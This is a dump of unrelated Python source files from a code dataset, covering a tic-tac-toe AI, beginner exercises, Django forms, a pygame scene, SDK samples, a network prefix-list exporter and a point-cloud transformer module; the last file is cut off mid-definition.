def checkRows(playerType):\n for row in range(3):\n result = checkRow(row,playerType)\n if result != False:\n return result\n return False\n \n def checkColumn(columnNum,playerType):\n count=0\n for row in range(3):\n if board[row][columnNum] == playerType:\n count += 1\n elif board[row][columnNum] != '_':\n count -= 1\n else:\n target = row\n if count == 2:\n return (columnNum, target)\n return False\n\n def checkColumns(playerType):\n for column in range(3):\n result = checkColumn(column,playerType)\n if result != False:\n return result\n return False\n \n def checkDiagonal(playerType):\n def helper(direction, playerType):\n if direction == 'left':\n column = 0\n else:\n column = 2\n count = 0\n for row in range(3):\n if board[row][column] == playerType:\n count += 1\n elif board[row][column] != '_':\n count -= 1\n else:\n targetPosition = (column, row)\n if direction == 'left':\n column += 1\n else:\n column -= 1\n if count == 2:\n return targetPosition\n return False\n result = helper('left', playerType)\n if not result:\n return helper('right', playerType)\n else:\n return result\n \n #make winning move if it exists\n wm_row = checkRows(player)\n if wm_row != False:\n return wm_row\n \n wm_column = checkColumns(player)\n if wm_column != False:\n return wm_column\n\n wm_diagonals = checkDiagonal(player)\n if wm_diagonals != False:\n return wm_diagonals\n \n #block other players winning move\n if player == 'X':\n playerType = 'O'\n else:\n playerType = 'X'\n \n wm_row = checkRows(playerType)\n if wm_row != False:\n return wm_row\n \n wm_column = checkColumns(playerType)\n if wm_column != False:\n return wm_column\n\n return checkDiagonal(playerType)\n\n def getSmartTurn(self,board):\n #these moves should be weighted in terms of success\n def getCornerMove(index):\n #move on corner\n if index == 0 and board[0][0] == '_':\n return (0,0)\n if index == 1 and board[0][2] == '_':\n return (2,0)\n if index == 2 and board[2][0] == '_':\n return (0,2)\n if index == 3 and board[2][2] == '_':\n return (2,2)\n return False\n \n cornerMove = getCornerMove(random.randint(0, 3))\n if cornerMove != False:\n return cornerMove\n\n #move on center\n if board[1][1] == '_':\n return (1,1)\n\n \n #move on side\n def getSideMove(index):\n if index == 0 and board[0][1] == '_':\n return (1,0)\n if index == 1 and board[1][0] == '_':\n return (0,1)\n if index == 2 and board[2][1] == '_':\n return (1,2)\n if index == 3 and board[1][2] == '_':\n return (2,1)\n return False\n\n sideMove = getSideMove(random.randint(0, 3))\n if sideMove != False:\n return sideMove\n \n def getTurn(self, board):\n \n if self.random:\n return self.getRandomTurn(board)\n \n winningMove = self.getWinningMove(board,self.playerType)\n if winningMove != False:\n return winningMove\n \n currentMax = -sys.maxsize\n key = self.boardToKey(board)\n if self.turnData.get(key):\n for y in range(len(self.turnData[key][0])):\n for x in range(len(self.turnData[key][0][y])):\n if isinstance(self.turnData[key][0][y][x],int) and self.turnData[key][0][y][x] > currentMax:\n currentMax = self.turnData[key][0][y][x]\n max_index = (x,y)\n if currentMax != -sys.maxsize and currentMax != 0:\n print('percentage move')\n return max_index\n else:\n print('programmed move')\n return self.getSmartTurn(board)\n \n def takeTurn(self, board, position):\n self.currentTurns.append({'board': copy.deepcopy(board), 'position':position})\n\n def makeTurn(self, board):\n position = self.getTurn(board)\n self.takeTurn(board, position)\n return position\n\n def convertBoard(self, board):\n output = copy.deepcopy(board)\n for y in range(len(output)):\n for x in range(len(output[y])):\n if output[y][x] == '_':\n output[y][x] = 0\n return output\n \n def updateTurnData(self, status):\n \n for turn in self.currentTurns:\n key = self.boardToKey(turn['board'])\n x = turn['position'][0]\n y = turn['position'][1]\n if not self.turnData.get(key):\n self.turnData[key] = [self.convertBoard(turn['board']), 1]\n #print(self.turnData[key][0])\n if status == 'win' or status == 'tie':\n #print('update win data')\n self.turnData[key][0][y][x] += 1 # increment total wins from this position\n else:\n #print('update losing data')\n if self.turnData[key][0][y][x] > 0:\n self.turnData[key][0][y][x] -= 1 # decrement total wins from this position\n self.turnData[key][1] += 1 # update total amount of turns at this scenario\n self.currentTurns = []\n \n \n \n \n \n \n \n \n \n","sub_path":"ai.py","file_name":"ai.py","file_ext":"py","file_size_in_byte":9280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"85682866","text":"#Think Python Exercise 2.4 number 2\n#Find the total wholesale cost of 60 books\n#Cover price is $24.95, bookstore price is 40% discount\n#Shipping is $3 for first copy and $0.75 for each additional copy\n\nprint('How many books?')\nquantity = input()\n\nsale = 24.95\nwholesaleEach = sale * 0.40\nsubtotal = sale * wholesaleEach\nprint('Subtotal = ' + str(subtotal))\n\nshipping = 3.00 + (quantity - 1)*0.75\n\ntotal = subtotal + shipping\n\nprint('Shipping will be ' + str(shipping) + '.')\n\nprint('Total will be ' + str(total) + '.')\n\n\n","sub_path":"Chapter02/ThinkPythonEx2.4.2.py","file_name":"ThinkPythonEx2.4.2.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"319198216","text":"from django import forms\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom .models import Loan\n\n\nclass NewUserForm(UserCreationForm):\n email = forms.EmailField(required=True)\n\n class Meta:\n model = User\n fields = (\"username\", \"email\", \"password1\", \"password2\")\n\n def save(self, commit=True):\n user = super(NewUserForm, self).save(commit=False)\n user.email = self.cleaned_data[\"email\"]\n if commit:\n user.save()\n return user\n \nclass PostForm(forms.ModelForm):\n \tclass Meta:\n model = Loan\n fields = [\n \"title\",\n \"reason\",\n \"amount\",\n \"gurrantor_1\",\n \"gurrantor_1_ID\",\n \"gurrantor_2\",\n \"gurrantor_2_ID\",\n ] ","sub_path":"client/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"519816279","text":"import pygame\nfrom pygame.draw import *\nfrom random import *\nfrom numpy import *\n\npygame.init()\n\nFPS = 30\nscreen = pygame.display.set_mode((1200, 750))\n\ndef house(x, y, size):\n w = 100 * size\n rect(screen, (0, 0, 0), (int(x), int(y + w), int(w), int(w)), 2)\n rect(screen, (91, 58, 41), (int(x + 2), int(y + w) + 2, int(w - 2), int(w - 2)), 0)\n rect(screen, (122, 217, 255), (int(x + w/4), int(y + 5*w/4), int(w / 2), int(w / 2)), 0)\n rect(screen, (204, 119, 34), (int(x + w/4) - 2, int(y + 5*w/4) - 2, int(w / 2) + 2, int(w / 2) + 2), 2)\n polygon(screen, (255, 0, 0), [(int(x), int(y + w)), (int(x + w/2), int(y + w/2)), (int(x + w), int(y + w))], 0)\n polygon(screen, (0, 0, 0), [(int(x), int(y + w)), (int(x + w/2), int(y + w/2)), (int(x + w), int(y + w))], 3)\n \ndef cloud(x, y, size):\n w = 100 * size\n r = w / 3\n a = 1\n while a <= 10:\n xx = randint(int(x + r), int(x + 2*w - r))\n yy = randint(int(y + r), int(y + w - r))\n circle(screen, (255, 255, 255), (xx, yy), int(r), 0)\n circle(screen, (0, 0, 0), (xx, yy), int(r), 1)\n a += 1\n\ndef tree(x, y, size):\n w = 100 * size\n r = w / 3\n rect(screen, (0, 0, 0), (int(x + 7*w/12), int(y + w), int(w / 6), int(w)), 0)\n circle(screen, (0, 153, 0), (int(x + w/2), int(y + w)), int(r), 0)\n circle(screen, (0, 0, 0), (int(x + w/2), int(y + w)), int(r), 2)\n circle(screen, (0, 153, 0), (int(x + 5*w/6), int(y + w)), int(r), 0)\n circle(screen, (0, 0, 0), (int(x + 5*w/6), int(y + w)), int(r), 2)\n circle(screen, (0, 153, 0), (int(x + w/3), int(y + 2*w/3)), int(r), 0)\n circle(screen, (0, 0, 0), (int(x + w/3), int(y + 2*w/3)), int(r), 2)\n circle(screen, (0, 153, 0), (int(x + w), int(y + 2*w/3)), int(r), 0)\n circle(screen, (0, 0, 0), (int(x + w), int(y + 2*w/3)), int(r), 2)\n circle(screen, (0, 153, 0), (int(x + 3*w/4), int(y + 2*w/3)), int(r), 0)\n circle(screen, (0, 0, 0), (int(x + 3*w/4), int(y + 2*w/3)), int(r), 2)\n circle(screen, (0, 153, 0), (int(x + w/2), int(y + w/3)), int(r), 0)\n circle(screen, (0, 0, 0), (int(x + w/2), int(y + w/3)), int(r), 2)\n circle(screen, (0, 153, 0), (int(x + 5*w/6), int(y + w/3)), int(r), 0)\n circle(screen, (0, 0, 0), (int(x + 5*w/6), int(y + w/3)), int(r), 2)\n \ndef sun(x, y, size):\n R = 100 * size\n r = R - 10\n w = 100 * size\n a = 0\n b = 0\n n = 20\n pl = []\n while a < 6.28:\n xx = x + R*cos(a)\n yy = y + R*sin(a)\n a += 3.14/n\n xxx = x + r*cos(a)\n yyy = y + r*sin(a)\n pl.append((int(xx), int(yy)))\n pl.append((int(xxx), int(yyy)))\n polygon(screen, (254, 254, 34), pl, 0)\n polygon(screen, (0, 0, 0), pl, 1)\n \n \n\nrect(screen, (30, 144, 255), (0, 0, 1200, 400), 0)\nrect(screen, (0, 255, 0), (0, 400, 1200, 350), 0)\nhouse(200, 150, 2)\nhouse(600, 200, 1.5)\ncloud(600, 100, 1.5)\ncloud(300, 100, 1)\ncloud(1000, 150, 1)\ntree(800, 350, 1.5)\ntree(450, 400, 1)\nsun(100, 100, 0.7)\n\n\npygame.display.update()\nclock = pygame.time.Clock()\nfinished = False\n\nwhile not finished:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n finished = True\n\npygame.quit()\n","sub_path":"lab3.1/pic2.py","file_name":"pic2.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"231731441","text":"# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport logging\nfrom airavata_sdk.clients.user_profile_client import UserProfileClient\n\nfrom airavata_sdk.clients.keycloak_token_fetcher import Authenticator\n\nfrom airavata.api.error.ttypes import TException\n\nfrom airavata.model.user.ttypes import UserProfile, Status\n\nlogger = logging.getLogger(__name__)\n\nlogger.setLevel(logging.DEBUG)\n\nauthenticator = Authenticator();\ntoken = authenticator.get_token_and_user_info_password_flow(\"default-admin\", \"123456\", \"default\")\n\n# load GroupManagerClient with default configuration\nclient = UserProfileClient()\n\n\n# load client with given configuration file (e.g customized_settings.ini)\n# client = UserProfileClient('../transport/settings.ini')\n\n\ndef add_user_profile():\n try:\n profile = UserProfile()\n profile.gatewayId = \"default\"\n profile.userId = \"default-admin\"\n profile.emails = ['gw@scigap.org']\n profile.airavataInternalUserId = \"default-admin\"\n profile.userModelVersion = \"1.0.0\"\n profile.firstName = \"Isuru\"\n profile.lastName = \"Ranawaka\"\n profile.creationTime = 1576103354\n profile.lastAccessTime = 1576103296\n profile.validUntil = 1607725696\n profile.State = Status.ACTIVE\n added_profile = client.add_user_profile(token, profile)\n print(\"Add user proflile\", added_profile)\n except TException:\n logger.exception(\"Error Occurred\")\n\n\ndef get_all_user_profiles_in_gateway():\n try:\n profiles = client.get_all_user_profiles_in_gateway(token, \"default\", 0, -1)\n print(\"User Profiles \", profiles)\n except TException:\n logger.exception(\"Error Occurred\")\n","sub_path":"airavata-api/airavata-client-sdks/airavata-python-sdk/airavata_sdk/samples/user_profile_client_samples.py","file_name":"user_profile_client_samples.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"311845538","text":"# -*- coding: utf-8 -*-\n\n\n\nimport os\nimport sys\nimport glob\nimport pandas as pd\n#import numpy\n\n\n'''\nFilenames are given via command line. You should run the script from the \ndirectory that contains the CSV/txt files. The first argument after the script \nthrough the final argument are the filenames.\n'''\n\ndir = os.getcwd()\nprint(\"wd:\", dir)\n\nif len(sys.argv) > 1:\n fil = sys.argv[1:]\n exps = (len(sys.argv) - 1)\n print(\"Files manually specified.\", exps, \"experiments found.\")\nelse:\n fil = glob.glob('*.csv')\n exps = len(fil)\n print(\"Reading all CSV files in directory.\", exps,\"experiments found.\")\nprint(fil)\n\n'''\nRead from external CSV that contains slopes (a), intercepts(b), and fits(c).\nCurrently, the curve file is not created via any script. I made my curves CSV \nfrom previous curve data.\n'''\nos.chdir(\"..\")\nprint(os.getcwd())\ncrvs = pd.read_csv(\"curves.csv\")\n#print(crvs)\n\nos.chdir(dir)\nprint(os.getcwd())\n\nexp_list = {}\nfor f in fil:\n fdf = pd.read_csv(f)\n exp_list[f] = pd.DataFrame(fdf)\n \nprint(len(exp_list))\nfor key in exp_list.keys():\n #print(\"\\n\" +\"=\"*40)\n print(key)\n #print(exp_list[key])\n\n\n\n\"\"\"\nfor f in fil:\n fdfs = {}\n fdfs.append(pd.read_csv(f))\n print(\"fdfs length:\", len(fdfs))\n for df in fdfs:\n gene = fdfs['Target Name']\n fdfs.drop(labels=['Target Name'], axis=1,inplace = True)\n fdfs.insert(0, 'Target Name', gene)\n sample = fdfs['Sample Name']\n fdfs.drop(labels=['Sample Name'], axis=1,inplace = True)\n fdfs.insert(1, 'Sample Name', sample)\n fdfs.groupby(['Sample Name', 'Target Name'])\n files.append(fdfs)\n print(len(files))\n print(fdfs)\n \"\"\"\n\n\n\n\n\n","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"205393852","text":"#! /usr/bin/env python3\n\n\"\"\"This represents a legacy-sdwan migration use case. This script takes a cisco IOS config file as an input,\nparses all prefix-lists configured and sets it to the json formated data structure which is send to the\nSD-WAN controller as an API call.\n\nAs a final result we see all the prefix-list transfered from raw text IOS config to the controller config object\nvia API\"\"\"\n\n\nfrom restapicalls import RestApiCalls\nimport json\nimport os\nimport sys\n\n\ndef prefix_payload_gen(file):\n pl_line = []\n dict_items_list = []\n i = 0\n k = 0\n\n with open(file, 'r') as f:\n data = f.read()\n\n for line in data.splitlines():\n if line.startswith('ip prefix-list'):\n pl_line.append(line)\n line_items = line.split(' ')\n name = line_items[line_items.index('prefix-list') + 1]\n dict_items = ({'name': name, 'entries': []})\n if dict_items not in dict_items_list:\n dict_items_list.append(dict_items)\n\n if not pl_line:\n print('No prefix-lists were found in the \"{}\" config-file'.format(file))\n else:\n for line in pl_line:\n line_items = line.split(' ')\n name = line_items[line_items.index('prefix-list') + 1]\n ipprefix = line_items[line_items.index('seq') + 3]\n\n if name != dict_items_list[i]['name']:\n i += 1\n k = 0\n\n dict_items_list[i]['entries'].insert(k, {'ipPrefix': ipprefix})\n if 'ge' in line_items:\n dict_items_list[i]['entries'][k].update({'ge': line_items[line_items.index('ge') + 1]})\n if 'le' in line_items:\n dict_items_list[i]['entries'][k].update({'le': line_items[line_items.index('le') + 1]})\n k += 1\n\n with open('api_call_data', 'w') as f:\n f.write(json.dumps(dict_items_list, indent=4))\n\n return dict_items_list\n\n\ndef _main():\n sdwan = RestApiCalls('10.177.28.62', 'admin', 'admin')\n for pl in prefix_payload_gen(sys.argv[1]):\n sdwan.post_request('template/policy/list/prefix', pl)\n print('Prefix-list {} parsed and exported to SD-WAN Controller'.format(pl['name']))\n\n\nif __name__ == \"__main__\":\n _main()\n","sub_path":"Scripts/prefix-list_export.py","file_name":"prefix-list_export.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"346898166","text":"# -*- coding: utf-8 -*-\nfrom pymongo import Connection\n\nfrom social_billing.engine.errors import ItemFormatError, UnknownItemError,\\\n InvalidCountError, CallbackError, SignatureError\nfrom social_billing.engine.handler.info import Info\nfrom social_billing.engine.handler.order import Order\nfrom social_billing.engine.handler.billing import BillingHandler\nfrom social_billing.engine.signature import Signature\n\n\nORDER = 'order_status_change'\nGET_ITEM = 'get_item'\n\n\nclass Payment(BillingHandler):\n\n def __init__(self, name, prices, secret, callback):\n self.db = Connection()['payment_%s' % name]\n self.collection = self.db['order']\n\n self.signature = Signature(secret)\n self.info = Info(prices)\n self.order = Order(self.collection, callback)\n\n def request(self, args):\n notification_type = args.get('notification_type')\n\n try:\n if not self.signature.check(args, args.pop('sig')):\n raise SignatureError()\n if notification_type.startswith(GET_ITEM):\n return self.info(args['item'])\n if notification_type.startswith(ORDER):\n return self.order(args['order_id'], args['receiver_id'],\n args['item'], args['status'])\n except (ItemFormatError, UnknownItemError, InvalidCountError,\n CallbackError, SignatureError) as error:\n return error.response()\n","sub_path":"social_billing/engine/payment.py","file_name":"payment.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"49137674","text":"\nimport bs\nimport bsInternal\nimport bsPowerup\nimport bsUtils\nimport random\n\nclass chatlogger(object):\n\n\tdef chatwritter(self,gname,msg):\n\n\n\t\twith open(bs.getEnvironment()['systemScriptsDirectory'] + \"/ChatsLogged.txt\",mode='a') as f:\n\t\t\tf.write(' || '+gname+' || '+msg+' \\n')\n\t\t\tf.close()\n\t\t\t\n\t \n\tdef checkId(self,nick): # check host (settings.cmdForMe)\n\t client_str = []\n\t for client in bsInternal._getGameRoster():\n\t if client['players'] != []:\n\t if client['players'][0]['name'] == nick.encode('utf-8'):\n\t client_str = client['displayString']\n\t #clientID = client['clientID']\n\t return client_str \n\n\t\n\n\nd=chatlogger()\ndef chatLogg(msg):\n if bsInternal._getForegroundHostActivity() is not None:\n\t\n n = msg.split(': ')\n d.chatwritter(n[0],n[1]) ","sub_path":"server files 1.4.148/data/scripts/chatLog.py","file_name":"chatLog.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"82819132","text":"__author__ = 'tusharsappal'\n\n\nfrom urllib import urlopen\nfrom xml.etree.ElementTree import parse\n\n## This script fetches the xml data from the given link and displays the data\n\n## Courtesy Python Cook Book 6.3\n\n\n\n\ndef parse_xml_data():\n u =urlopen('http://planet.python.org/rss20.xml')\n\n ## Replace the url with the actual url to be fetched\n\n doc=parse(u)\n\n for item in doc.iterfind('channel/item'):\n title = item.findtext('title')\n date = item.findtext('pubDate')\n link = item.findtext('link')\n\n\n print(title)\n print(date)\n print(link)\n\n\n\n\nparse_xml_data()\n\n","sub_path":"python_scripts/python_cook_book_receipes/encoding_processing_files/parsing_xml_data.py","file_name":"parsing_xml_data.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"207964203","text":"\n\ndef prime_test(list_of_numbers):\n list_of_primes = []\n list_of_composites = []\n \n for number in list_of_numbers:\n list_of_possible_factors = list(range(2, int((number**0.5)+1)))\n factors = []\n for each_number in list_of_possible_factors:\n if number % each_number == 0:\n factors.append(each_number)\n if len(factors) == 0:\n list_of_primes.append(number)\n else:\n list_of_composites.append(number)\n\n print(f'Primes between 2 and {limit}: {list_of_primes}')\n # print(f'Composites between 2 and {limit}: {list_of_composites}')\n\n\nlimit = 10\nprime_test(list(range(2, limit)))\n\n\n","sub_path":"prime_generator.py","file_name":"prime_generator.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"417963940","text":"import itertools\nimport operator\nimport time\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport numpy as np\nimport numpy.ma as ma\n\n#from pointnet2_utils import furthest_point_sample as farthest_point_sample_cuda\nfrom pointnet2_utils import gather_operation as index_points_cuda_transpose\nfrom pointnet2_utils import grouping_operation as grouping_operation_cuda\nfrom pointnet2_utils import ball_query as query_ball_point_cuda\nfrom pointnet2_utils import QueryAndGroup\n\n\n#from knn_cuda import KNN\nimport MinkowskiEngine as ME\n\ndef square_distance(src, dst):\n \"\"\"\n Calculate Euclid distance between each two points.\n src^T * dst = xn * xm + yn * ym + zn * zm;\n sum(src^2, dim=-1) = xn*xn + yn*yn + zn*zn;\n sum(dst^2, dim=-1) = xm*xm + ym*ym + zm*zm;\n dist = (xn - xm)^2 + (yn - ym)^2 + (zn - zm)^2\n = sum(src**2,dim=-1)+sum(dst**2,dim=-1)-2*src^T*dst\n Input:\n src: source points, [B, N, C]\n dst: target points, [B, M, C]\n Output:\n dist: per-point square distance, [B, N, M]\n \"\"\"\n return torch.sum((src[:, :, None] - dst[:, None]) ** 2, dim=-1)\n\n\ndef index_points_cuda(points, idx):\n \"\"\"\n\n Input:\n points: input points data, [B, N, C]\n idx: sample index data, [B, S]\n Return:\n new_points:, indexed points data, [B, S, C]\n \"\"\"\n points = points.transpose(1,2).contiguous() #[B, C, N]\n new_points = index_points_cuda_transpose(points, idx) #[B, C, S]\n \n return new_points.transpose(1,2).contiguous()\n\n\ndef stem_knn(xyz, points, k):\n knn = KNN(k=k, transpose_mode=True)\n xyz = xyz.permute([0,2,1])\n _, idx = knn(xyz.contiguous(), xyz) # xyz: [bs, npoints, coord] idx: [bs, npoint, k]\n idx = idx.int()\n \n # take in [B, 3, N]\n grouped_xyz = grouping_operation_cuda(xyz.transpose(1,2).contiguous(), idx) # [bs, xyz, n_point, k]\n grouped_points = grouping_operation_cuda(points.contiguous(), idx) #B, C, npoint, k)\n\n return grouped_xyz, grouped_points\n\n\ndef sample_and_group_cuda(npoint, k, xyz, points):\n \"\"\"\n Input:\n npoint:\n k:\n xyz: input points position data, [B, N, 3]\n points: input points data, [B, C, N]\n Return:\n new_xyz: sampled points position data, [B, 3, npoint]\n new_points: sampled points data, [B, C+C_xyz, npoint, k]\n grouped_xyz_norm: sampled relative points position data, [B, 3, npoint, k]\n \"\"\"\n k = min(npoint, k)\n knn = KNN(k=k, transpose_mode=True)\n\n B, N, C_xyz = xyz.shape\n\n if npoint < N:\n fps_idx = farthest_point_sample_cuda(xyz, npoint) # [B, npoint]\n torch.cuda.empty_cache()\n new_xyz = index_points_cuda(xyz, fps_idx) #[B, npoint, 3]\n else:\n new_xyz = xyz\n\n \n torch.cuda.empty_cache()\n _, idx = knn(xyz.contiguous(), new_xyz) # B, npoint, k\n idx = idx.int()\n \n torch.cuda.empty_cache()\n grouped_xyz = grouping_operation_cuda(xyz.transpose(1,2).contiguous(), idx).permute(0,2,3,1) # [B, npoint, k, C_xyz]\n #print(grouped_xyz.size())\n torch.cuda.empty_cache()\n grouped_xyz_norm = grouped_xyz - new_xyz.view(B, npoint, 1, C_xyz) # [B, npoint, k, 3]\n grouped_xyz_norm = grouped_xyz_norm.permute(0,3,1,2).contiguous()# [B, 3, npoint, k]\n torch.cuda.empty_cache()\n\n grouped_points = grouping_operation_cuda(points.contiguous(), idx) #B, C, npoint, k\n\n new_points = torch.cat([grouped_xyz_norm, grouped_points], dim=1) # [B, C+C_xyz, npoint, k]\n \n\n return new_xyz.transpose(1,2), grouped_xyz_norm, new_points\n\nclass TDLayer(nn.Module):\n def __init__(self, input_dim, out_dim, k=16):\n super().__init__()\n '''\n Transition Down Layer\n npoint: number of input points\n nsample: k in kNN, default 16\n in_dim: feature dimension of the input feature x (output of the PCTLayer)\n out_dim: feature dimension of the TDLayer\n\n '''\n self.k = k\n self.input_dim = input_dim\n self.out_dim = out_dim\n\n self.mlp_convs = nn.ModuleList()\n self.mlp_bns = nn.ModuleList()\n\n self.mlp_convs.append(nn.Conv2d(input_dim+3, input_dim, 1))\n self.mlp_convs.append(nn.Conv2d(input_dim, out_dim, 1))\n self.mlp_bns.append(nn.BatchNorm2d(input_dim))\n self.mlp_bns.append(nn.BatchNorm2d(out_dim))\n\n self.conv = ME.MinkowskiConvolution(\n input_dim,\n out_dim,\n kernel_size=3,\n stride=2,\n bias=False,\n dimension=3\n )\n\n def forward(self, x : ME.SparseTensor):\n \"\"\"\n Input:\n xyz: input points position data, [B, 3, N]\n points: input points data, [B, C, N]\n Return:\n new_xyz: sampled points position data, [B, C, S]\n new_points_concat: sample points feature data, [B, D', S]\n \"\"\"\n # B, input_dim, npoint = list(xyz.size())\n #xyz = xyz.permute(0, 2, 1)\n\n # new_xyz, grouped_xyz_norm, new_points = sample_and_group_cuda(self.npoint, self.k, xyz, points)\n # new_xyz: sampled points position data, [B, 3, npoint]\n # new_points: sampled points data, [B, C+C_xyz, npoint,k]\n # grouped_xyz_norm: [B, 3, npoint,k]\n\n # for i, conv in enumerate(self.mlp_convs):\n # bn = self.mlp_bns[i]\n # new_points = F.relu(bn(conv(new_points)))\n\n\n # new_points_pooled = torch.max(new_points, 3)[0] # local max pooling\n x = self.conv(x)\n return x\n\nclass TULayer(nn.Module):\n def __init__(self, input_dim, out_dim, k=3):\n super().__init__()\n '''\n Transition Up Layer\n npoint: number of input points\n nsample: k in kNN, default 3\n in_dim: feature dimension of the input feature x (output of the PCTLayer)\n out_dim: feature dimension of the TDLayer\n\n '''\n self.k = k\n self.input_dim = input_dim\n self.out_dim = out_dim\n\n self.linear_1 = nn.Conv1d(input_dim, out_dim, 1)\n self.linear_2 = nn.Conv1d(out_dim, out_dim, 1)\n\n self.conv = ME.MinkowskiConvolutionTranspose(\n in_channels=input_dim,\n out_channels=out_dim,\n kernel_size=3,\n stride=2,\n dimension=3\n )\n\n def forward(self, x : ME.SparseTensor):\n \"\"\"\n Input:\n M < N\n xyz_1: input points position data, [B, 3, M]\n xyz_2: input points position data, [B, 3, N]\n points_1: input points data, [B, C, M]\n points_2: input points data, [B, C, N]\n\n interpolate xyz_2's coordinates feature with knn neighbor's features weighted by inverse distance\n\n Return:\n new_xyz: sampled points position data, [B, C, S]\n new_points_concat: sample points feature data, [B, D', S]\n \"\"\"\n\n # B, input_dim, M = list(points_1.size())\n # B, output_dim, N = list(points_2.size())\n\n # points_1 = self.linear_1(points_1)\n # points_2 = self.linear_2(points_2)\n\n\n # dists = square_distance(xyz_2.transpose(1,2), xyz_1.transpose(1,2)) # [B, N, M]\n # dists, idx = dists.sort(dim=-1)\n # dists, idx = dists[:,:,:self.k], idx[:,:,:self.k]\n\n # dist_recip = 1.0 / (dists + 1e-8)\n # norm = torch.sum(dist_recip, dim=2, keepdim=True)\n # weight = dist_recip / norm\n # interpolated_points = torch.sum( \\\n # grouping_operation_cuda(points_1, idx.int())*weight.view(B, 1, N, 3)\n # ,dim=-1)\n\n\n # return xyz_2 , (interpolated_points + points_2)\n x = self.conv(x)\n return x\n\ndef index_points(points, idx):\n \"\"\"\n Input:\n points: input points data, [B, N, C]\n idx: sample index data, [B, S, [K]]\n Return:\n new_points:, indexed points data, [B, S, [K], C]\n \"\"\"\n raw_size = idx.size()\n idx = idx.reshape(raw_size[0], -1)\n res = torch.gather(points, 1, idx[..., None].expand(-1, -1, points.size(-1)))\n return res.reshape(*raw_size, -1)\n\nclass TransposeLayerNorm(nn.Module):\n\n def __init__(self, dim):\n super(TransposeLayerNorm, self).__init__()\n self.dim = dim\n self.norm = nn.LayerNorm(dim)\n\n def forward(self, x):\n if len(x.shape) == 3:\n # [bs, in_dim, npoints]\n pass\n elif len(x.shape) == 4:\n # [bs, in_dim, npoints, k]\n pass\n else:\n raise NotImplementedError\n\n return self.norm(x.transpose(1,-1)).transpose(1,-1)\n\nclass PTBlock(nn.Module):\n def __init__(self, in_dim, is_firstlayer=False, n_sample=16, r=10):\n super().__init__()\n '''\n Point Transformer Layer\n\n in_dim: feature dimension of the input feature x\n out_dim: feature dimension of the Point Transformer Layer(currently same with hidden-dim)\n [?] - not sure how to set hidden. the paper only gives the out\n '''\n\n self.r = r # neighborhood cube radius\n self.in_dim = in_dim\n self.is_firstlayer = is_firstlayer\n\n # TODO: set the hidden/vector/out_dims\n self.hidden_dim = in_dim\n # self.out_dim = min(4*in_dim, 512)\n self.out_dim = in_dim\n self.vector_dim = self.out_dim\n self.n_sample = n_sample\n\n # whether use BN or LN or None\n # 0 - None\n # 1 - BN\n # 2 - LN\n\n self.use_bn = 1\n # use transformer-like preLN before the attn & ff layer\n self.pre_ln = False\n\n # whether to use the vector att or the original attention\n self.use_vector_attn = True\n self.nhead = 4\n\n self.linear_top = nn.Sequential(\n ME.MinkowskiConvolution(in_dim, self.hidden_dim, kernel_size=1, dimension=3),\n ME.MinkowskiBatchNorm(self.hidden_dim) if self.use_bn else nn.Identity()\n )\n self.linear_down = nn.Sequential(\n ME.MinkowskiConvolution(self.out_dim, self.in_dim, kernel_size=1, dimension=3),\n ME.MinkowskiBatchNorm(self.in_dim) if self.use_bn else nn.Identity()\n )\n # feature transformations\n self.phi = nn.Sequential(\n ME.MinkowskiConvolution(self.hidden_dim, self.out_dim, kernel_size=1, dimension=3)\n )\n self.psi = nn.Sequential(\n ME.MinkowskiConvolution(self.hidden_dim, self.out_dim, kernel_size=1, dimension=3)\n )\n self.alpha = nn.Sequential(\n ME.MinkowskiConvolution(self.hidden_dim, self.out_dim, kernel_size=1, dimension=3)\n )\n\n# self.gamma = nn.Sequential(\n# ME.MinkowskiConvolution(self.out_dim, self.hidden_dim, kernel_size=1, dimension=3),\n# ME.MinkowskiBatchNorm(self.hidden_dim) if self.use_bn else nn.Identity(),\n# ME.MinkowskiReLU(),\n# ME.MinkowskiConvolution(self.hidden_dim, self.vector_dim, kernel_size=1, dimension=3),\n# ME.MinkowskiBatchNorm(self.vector_dim) if self.use_bn else nn.Identity()\n# )\n#\n# self.delta = nn.Sequential(\n# ME.MinkowskiConvolution(3, self.hidden_dim, kernel_size=1, dimension=3),\n# 